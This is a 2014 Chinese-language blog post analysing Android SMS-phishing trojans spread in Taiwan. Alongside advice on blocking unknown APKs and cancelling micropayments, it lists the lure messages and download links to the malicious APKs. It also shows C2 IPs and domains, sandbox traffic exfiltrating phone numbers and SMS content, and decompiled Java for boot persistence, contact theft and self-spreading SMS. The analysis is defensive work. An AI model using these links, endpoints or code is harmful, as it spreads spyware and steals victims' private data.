Contents ...
udn網路城邦
android 簡訊病毒:
2014/05/18 22:18
瀏覽891
迴響0
推薦0
引用0

Step 1. 開啟「設定」,選擇「安全性」之後,再取消勾選「未知的來源」 (允許安裝非Market應用程式),如下圖:

經過這樣的設定之後,我們就只能從Google Play上安裝APP,就算去點擊了簡訊的goo.gl超連結,而下載到宅急便的憑證.apk檔案,也再一次不小心又按到了下載後的apk檔案,並且再一次不小心再去點擊了「程式安裝器」,你的手機在安裝時,都會直接將安裝程式給擋下,出現「安裝遭封鎖」的訊息,如下圖:

因此,從另一個角度來看,如果你希望安裝下載來的apk檔案,就必需去勾選這個「未知的來源」,才有辦法安裝。

取消「小額付費」的服務

話說這個小額付費的服務,對於一般人來說,似乎是沒什麼作用…
所以請打各自電信公司的客服,去停了它吧!就算沒有中毒,你也應該去停掉它…
  • 中華電信:手機直撥800,或0800080090客服專線
  • 台灣大哥大:手機直撥 188免費 或 02-66062999
  • 遠傳電信:手機直撥888/123 市話撥449-5888/449-5123
android 簡訊病毒號碼: 0912104628
android 簡訊病毒網址: http://goo.gl/4zjSLG
android 簡訊病毒內容: 您的法院訴訟
android 簡訊病毒網址: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk 

android 簡訊病毒號碼: 0955164020
android 簡訊病毒內容: 您的民事賠償
android 簡訊病毒網址: http://goo.gl/9Ofdu2
android 簡訊病毒網址: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
流量分析: http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time

- Broadcast Receivers 
com.example.google.service.MyDeviceAdminReceiver
intent-filter action: android.app.action.DEVICE_ADMIN_ENABLED
com.example.google.service.SMSServiceBootReceiver
intent-filter action: android.intent.action.BOOT_COMPLETED
com.example.google.service.SMSReceiver
intent-filter action: android.provider.Telephony.SMS_RECEIVED
TaskRequest

 - Required Permissions 
android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED



- Used Permissions 
android.permission.SEND_SMS
method call: "Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call: "Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
method call: "Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call: "Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
android.permission.READ_PHONE_STATE
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"
method call: "Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"
android.permission.VIBRATE
method call: "Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls"Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call: "Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"
android.permission.ACCESS_NETWORK_STATE
method call: "Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call: "Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
android.permission.CHANGE_COMPONENT_ENABLED_STATE
method call: "Lcom/example/google/service/MainActivity/HideIcon()V" calls"Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"
android.permission.WAKE_LOCK
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls"Landroid/os/PowerManager$WakeLock/release()V"
method call: "Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"
android.permission.READ_CONTACTS
method call: "Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
method call: "Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
android.permission.INTERNET
method call: "Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"

 - Used Features 
android.hardware.telephony
android.hardware.touchscreen

net:
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

leak:
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

dns:
muc03s07-in-f14.1e100.net 

http:

Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new

tcp:
173.194.44.14:443

android 簡訊病毒號碼: 0926566920
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/6yOcoV (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=
2014-06-02 19:07:04 ERROR 509: Bandwidth Error.
流量分析: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time


android 簡訊病毒號碼: 0933398720
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/6fs5jx  (已分析)
android 簡訊病毒網址: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=
電子表單.apk
流量分析: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name Query Type Query Result Successful Protocol
ybbcel888.vicp.cc  DNS_TYPE_A  220.136.223.64  udp 
ybbcel999.eicp.net  DNS_TYPE_A  220.136.213.43  udp

tcp:220.136.223.64:9090

Ad-Aware  Android.Trojan.SMSSend.ND  20140602
AegisLab  SUSPICIOUS  20140602
AhnLab-V3  Android-Malicious/Litch  20140602
AntiVir  Android/SmsAgent.EB.Gen  20140602
Avast  Android:RuSMS-AH [Trj]  20140602
BitDefender  Android.Trojan.SMSSend.ND  20140602
DrWeb  Android.SmsBot.72.origin  20140602
ESET-NOD32  a variant of Android/TrojanSMS.Agent.ADD 20140602
Emsisoft  Android.Trojan.SMSSend.ND (B)  20140602
F-Secure  Trojan:Android/SmsSend.IE  20140601
GData  Android.Trojan.SMSSend.ND  20140602
Kaspersky  HEUR:Trojan-Spy.AndroidOS.SmForw.al  20140602
MicroWorld-eScan  Android.Trojan.SMSSend.ND  20140602
Sophos  Andr/SMSSend-EC

android 簡訊病毒號碼: 0961267359
android 簡訊病毒內容: 宅急便 快遞
android 簡訊病毒網址: http://goo.gl/58ooGF (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=
憑證.apk
http://goo.gl/#analytics/goo.gl/58ooGF/all_time

Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!

android 簡訊病毒內容:  黑貓宅急便
android 簡訊病毒網址:  http://goo.gl/em7bab   (已分析)
[application/vnd.android.package-archive]
android 簡訊病毒網址:  https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=
http://goo.gl/#analytics/goo.gl/em7bab/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name Query Type Query Result Successful Protocol
ybbcel999.eicp.net  DNS_TYPE_A  61.228.130.24  udp 
ybbcel888.vicp.cc  DNS_TYPE_A  220.136.213.160  udp

android 簡訊病毒內容:  黑貓宅急便(2)
 android 簡訊病毒網址: http://goo.gl/SOkMHW   (已分析)
android 簡訊病毒網址:  https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk
http://goo.gl/#analytics/goo.gl/SOkMHW/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name Query Type Query Result Successful Protocol
buyaoa1.vicp.co  DNS_TYPE_A  111.249.169.13  udp 
yemian3.vicp.co  DNS_TYPE_A  220.136.220.151  udp

tcp:111.249.169.13:9090

android 簡訊病毒內容:  張瑞芬您申請網上支付電費
android 簡訊病毒網址:  http://goo.gl/k0jo8D   (已分析)
[application/vnd.android.package-archive]
http://goo.gl/#analytics/goo.gl/k0jo8D/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name Query Type Query Result Successful Protocol
ybbcel999.eicp.net  DNS_TYPE_A  61.228.130.220  udp 
ybbcel888.vicp.cc  DNS_TYPE_A  61.228.131.215  udp

android 簡訊病毒內容:  您的快遞簽收通知單
android 簡訊病毒網址:  http://goo.gl/1MN94O   (已分析)
android 簡訊病毒網址:  https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
http://goo.gl/#analytics/goo.gl/1MN94O/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898
Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898

dns:

Name Query Type Query Result Successful Protocol
xdynfa.vicp.co  DNS_TYPE_A  211.20.68.250 
boyiis.iego.cn  DNS_TYPE_A  114.25.31.243 
android.clients.google.com  DNS_TYPE_A  173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161 
162.116.194.173.in-addr.arpa  DNS_TYPE_PTR 


service:

Timestamp Service Name
3.232 com.android.vending.util.WorkService
3.232 com.android.vending.util.WorkService
11.234 msc.switchlib.act.BaseService
22.241 com.android.music.MediaPlaybackService
23.236 com.android.music.MediaPlaybackService
23.237 com.android.music.MediaPlaybackService
24.241 com.android.music.MediaPlaybackService
24.242 com.android.music.MediaPlaybackService
25.237 com.android.music.MediaPlaybackService
30.232 com.android.music.MediaPlaybackService
31.237 com.android.music.MediaPlaybackService
60.249 com.android.music.MediaPlaybackService
60.249 com.android.music.MediaPlaybackService
72.252 msc.switchlib.act.BaseService
78.253 msc.switchlib.act.BaseService
162.486 com.android.mms.transaction.SmsReceiverService
162.487 com.android.mms.transaction.SmsReceiverService
167.490 msc.switchlib.act.BaseService
179.985 msc.switchlib.act.BaseService
179.986 msc.switchlib.act.BaseService
179.986 com.android.email.service.EmailBroadcastProcessorService
179.986 com.android.email.service.EmailBroadcastProcessorService
179.986 com.google.android.gsf.checkin.CheckinService
179.986 com.google.android.gsf.checkin.CheckinService
179.986 com.android.exchange.SyncManager
180.991 com.google.android.gsf.update.SystemUpdateService
180.991 com.google.android.gsf.update.SystemUpdateService
180.991 com.google.android.partnersetup.AppHiderService
180.992 com.google.android.partnersetup.AppHiderService
180.992 com.android.providers.downloads.DownloadService
180.992 com.android.providers.downloads.DownloadService
181.986 com.android.mms.transaction.SmsReceiverService
181.986 com.android.mms.transaction.SmsReceiverService
181.986 com.android.providers.media.MediaScannerService
181.986 com.android.providers.media.MediaScannerService
181.986 com.android.vending.util.AlarmService
181.986 com.android.vending.util.AlarmService
182.991 com.android.providers.calendar.EmptyService
182.991 com.android.bluetooth.opp.BluetoothOppService
182.991 com.android.bluetooth.opp.BluetoothOppService
182.991 com.google.android.gm.MailIntentService
182.992 com.google.android.gm.MailIntentService
182.992 com.google.android.gm.downloadprovider.DownloadService
182.992 com.google.android.gm.downloadprovider.DownloadService
187.998 com.google.android.gsf.checkin.CheckinService
187.998 com.google.android.gsf.checkin.CheckinService
187.998 com.google.android.gsf.update.SystemUpdateService
187.998 com.google.android.gsf.update.SystemUpdateService
189.998 com.google.android.partnersetup.AppHiderService
189.999 com.google.android.partnersetup.AppHiderService
197.993 com.google.android.gsf.checkin.CheckinService
197.993 com.google.android.gsf.checkin.CheckinService
197.993 com.google.android.gsf.checkin.EventLogService
197.993 com.google.android.gsf.checkin.EventLogService
197.993 com.android.providers.calendar.EmptyService
197.993 com.google.android.gsf.checkin.EventLogService
197.994 com.google.android.gsf.checkin.EventLogService
207.413 com.google.android.gsf.checkin.CheckinService
207.413 com.google.android.gsf.checkin.CheckinService
207.413 com.google.android.gsf.update.SystemUpdateService
207.413 com.google.android.gsf.update.SystemUpdateService
209.412 com.google.android.partnersetup.AppHiderService
209.412 com.google.android.partnersetup.AppHiderService

android 簡訊病毒內容:  宅急便快遞通知
android 簡訊病毒網址:  wget http://goo.gl/6U6J3B  (無法下載)
android 簡訊病毒網址:  https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=
ERROR 509: Bandwidth Error.
http://goo.gl/#analytics/goo.gl/6U6J3B/all_time


android 簡訊病毒內容:  瑞芬找到你了
android 簡訊病毒網址:  wget http://goo.gl/976Zaj (無法下載)
android 簡訊病毒網址:  http://211.44.3.186/11/index.php
http://goo.gl/#analytics/goo.gl/976Zaj/all_time

用電腦開時,他會去判斷這是電腦,所以就導到新聞網頁去
但如果用手機開啟,就會讓你下載apk檔
再來分析一下註冊的IP
211.44.3.186
經過whois的查詢
是註冊在 Korea Network infomation Center(韓國網路資訊中心)
想也知道宅配公司怎麼可能會用韓國的IP


android 簡訊病毒內容:  您正在申請網上支付電費
android 簡訊病毒網址:  wget http://goo.gl/UB9zBa (無法下載)
android 簡訊病毒網址:  http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
http://goo.gl/#analytics/goo.gl/UB9zBa/all_time

詐騙簡訊內容:您正在申請網上支付103年2月電費共計367元, 若非本人操作, 請查看電子憑證進行取消 http://goo.gl/UB9zBa 


點選會到http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk下載apk,若開啟安裝,則出現:


資安分析:

1. 這隻惡意apk可以讀取手機:通訊錄朋友的姓名電話、簡訊SMS訊息,會把使用者的手機號碼上傳至203.69.59.153 這一個IP:
[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]
2. IP使用whois系統查詢 http://www.whois365.com/tw/ip/203.69.59.153 
顯示為中華電信所管轄的IP,可能是客戶租用的IP主機被駭?
3. 駭客持續的攻擊分佈集中在下述日期:3/26:1706次、3/31:2946次、4/3:3873次、4/7:4869次。 目前總計超過31000次。(以上數字依照使用者點選短網址統計報表,但有警覺性的使用者,真實攻擊次數更多)直至本篇截稿前,該被駭IP的網路服務仍然存在。
  
最近非常夯的簡訊病毒,很多朋友都有收到這樣的簡訊,我的Android 手機也收到好幾次, 
不過,既然自己接觸 Android 也有不短的時間了,那就剛好發揮一下專業來看看這個病毒到底會做些什麼事情。
Android APK 程式包裝是著名的容易反組譯,幾年前也剛好有個很強的反組譯軟體dex2jar 出現,搭配 JD-GUI 還能很容易的看到反組譯出來的原始碼,大家有興趣也可以試試看。

如果想要知道怎麼反組譯,可以參考下面的步驟,

1. 安裝好 dex2jar  JD-GUI
2.  command line 執行
        $> dex2jar.sh apkfile

    這樣會在資料夾內產生一個名為 apkfile_dex2jar.jar 的檔案
3.  JD-GUI 打開該檔案就可以看到原始碼

-----
下面總結一下這個簡訊病毒的相關實作細節,
這個病毒會取得下面這些權限,
    android.permission.READ_PHONE_STATE
    android.permission.SEND_SMS
    android.permission.READ_SMS
    android.permission.WRITE_SMS
    android.permission.RECEIVE_SMS
    android.permission.INTERNET
    android.permission.CALL_PHONE
    android.permission.READ_CONTACTS
    android.permission.WRITE_EXTERNAL_STORAGE
    com.android.launcher.action.INSTALL_SHORTCUT

這些權限都是跟簡訊和聯絡人資料有關,跟我們所知道的病毒行為相符。

我們從 AndroidManifest.xml 可以看得出來它有三個關鍵組件,
        ".SMSServices">
            
                "com.example.android.services.SMSServices" />
            

        

        "SMSServiceBootReceiver">
            
                "android.intent.action.BOOT_COMPLETED" />
            

        

         android:name="SMSSender" />

每次手機開機,SMSServiceBootReceiver 都會收到 Broadcast,裡面的行為就是啟動 SMSService,所以手機重開機也無法停止病毒的行動。
public class SMSServiceBootReceiver extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Intent localIntent = new Intent();
    localIntent.setAction("com.example.android.services.SMSServices");
    paramContext.startService(localIntent);
  }
}
這個病毒的預設起始元件是 MainActivity,剛啟動時會去檢查是不是用 Emulator 執行該 APK,看來是怕被 try 病毒行為,可能也跟他的 Server 有關係吧。

剛剛有提到手機開機就會去執行 SMSService,另外,一旦我們執行這個程式後,SMSService 也會被啟動,基本上就是要確保SMSService 能夠被運行起來。

 SMSService 裡面會啟動 SMSObserver  SMSSender,接下來我們再來看這幾個部分。

SMSObserver 的部分,他會去看你的簡訊收件匣裡面所有未讀的簡訊,並把你收到的簡訊內容截取出來,最後將這些簡訊的內容送出到遠端 Server,內容會包含下面幾個資訊,

·                     你自己的手機號碼
·                     來訊者的手機號碼
·                     訊息內容
·                     訊息傳送時間
傳送到遠端 Server 的方式,看起來是一台 Microsoft-IIS/7.0 Server,似乎是用 ASP.NET 寫的 WebService,下面是他傳送到Server  format,使用 GET operation,基本上,後續的相關行為都會傳到該 Server,而且 Server 會回傳一些內容,作為 Client 的使用,但我嘗試用 Postman 送些 Request 過去,似乎沒有接到任何回傳,Server 可能有擋一些濫用 API 的行為,但也可能是我下的 Http Request 格式還是有問題吧。
        http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=你的手機號碼&a=朋友的手機號碼&m=訊息內容&d=傳送時間
這樣的 Request 出去實在很可怕,遠端 Server 應該會把這些資料都記起來,又可以再販賣個資,也可以作為日後發送簡訊的內容參考,甚至是增進社交工程的技術,現在透過網際網路,所有資訊的流通都很迅速,經由連網裝置,一旦有機可乘,就能很容易地竊取到私密資料,太可怕了。
SMSSender 的部分,它被啟動時,會去運行 Contact class 裡面的程式碼,
public void Send()
  throws UnsupportedEncodingException, ParserConfigurationException, InterruptedException
{
  ArrayList localArrayList = newContactsHelper(this._Context).GetAllContacts();
  WebServiceCalling localWebServiceCalling = newWebServiceCalling(this._Context);
  String str1 = Tools.getPhoneNumber(this._Context);
  String str2 = "";
  Iterator localIterator = localArrayList.iterator();
  while (true)
  {
    if (!localIterator.hasNext())
    {
      if (str2.length() > 0)
        localWebServiceCalling.SC(null, str1, str2);
      return;
    }
    String str3 = (String)localIterator.next();
    str2 = str2 + "," + str3;
    if (str2.length() > 20)
    {
      localWebServiceCalling.SC(null, str1, str2);
      str2 = "";
    }
  }
}
這部分會去看你手機上的通訊錄,把通訊錄上所有聯絡人都擷取出來,然後傳送到遠端 Server,傳送內容會包含,
·                     你自己的手機號碼
·                     聯絡人名稱
·                     聯絡人手機號碼
另外,它也會傳送簡訊給其他聯絡人,
localSmsManager.sendTextMessage(str8.trim(), null, str9, null, null);
  localWebServiceCalling.log("SMS", "S", str1, str8 + "|" + str9);
60秒它就會傳送你的聯絡人資料到遠端 Server 並傳送簡訊給其他聯絡人,
public static void sendUpdateBroadcastRepeat(Context paramContext)
{
  PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, newIntent(paramContext, SMSSender.class), 0);
  long l = SystemClock.elapsedRealtime();
  ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 60000L, localPendingIntent);
}
另外看到所有的 Http GET 操作,都會再把 Http Response 的內容透過 Message 丟給注入的 Handler 做其他處理。
new Thread(new Runnable()
{
  public void run()
  {
    try
    {
      String str = WebServiceCalling.this.callWS(paramString);
      if (paramHandler != null)
      {
        Message localMessage = new Message();
        localMessage.what = paramInt;
        localMessage.obj = str;
        paramHandler.sendMessage(localMessage);
      }
      return;
    }
    catch (UnsupportedEncodingException localUnsupportedEncodingException)
    {
      localUnsupportedEncodingException.printStackTrace();
      return;
    }
    catch (ParserConfigurationException localParserConfigurationException)
    {
      localParserConfigurationException.printStackTrace();
    }
  }
}).start();
簡訊內容的來源是遠端server,所以應該可以很快地改變訊息發送的內容,也可以依據狀況改變要發送的連結內容。
另外,他還會監控你的來電,當有手機來電時,會將電話轉到 #,這是我不太理解的部分,不清楚轉號碼到這個 # 號會變怎麼樣,是會接掛斷電話?還是跟 USSD 漏洞有關係?
-----
以上就是病毒程式碼大致的狀況,雖然這個病毒還需要安裝執行才會有作用,不過對於一般人來說,應該比較難警覺到 App 有詐。因為一旦被感染後,病毒就可以直接存取聯絡人資料,所以傳播速度真是非常快,這些病毒的猖獗真是可怕。
全站分類:休閒生活 網路生活
自訂分類:不分類
下一則: sqmdata00.sqm

限會員,要發表迴響,請先登入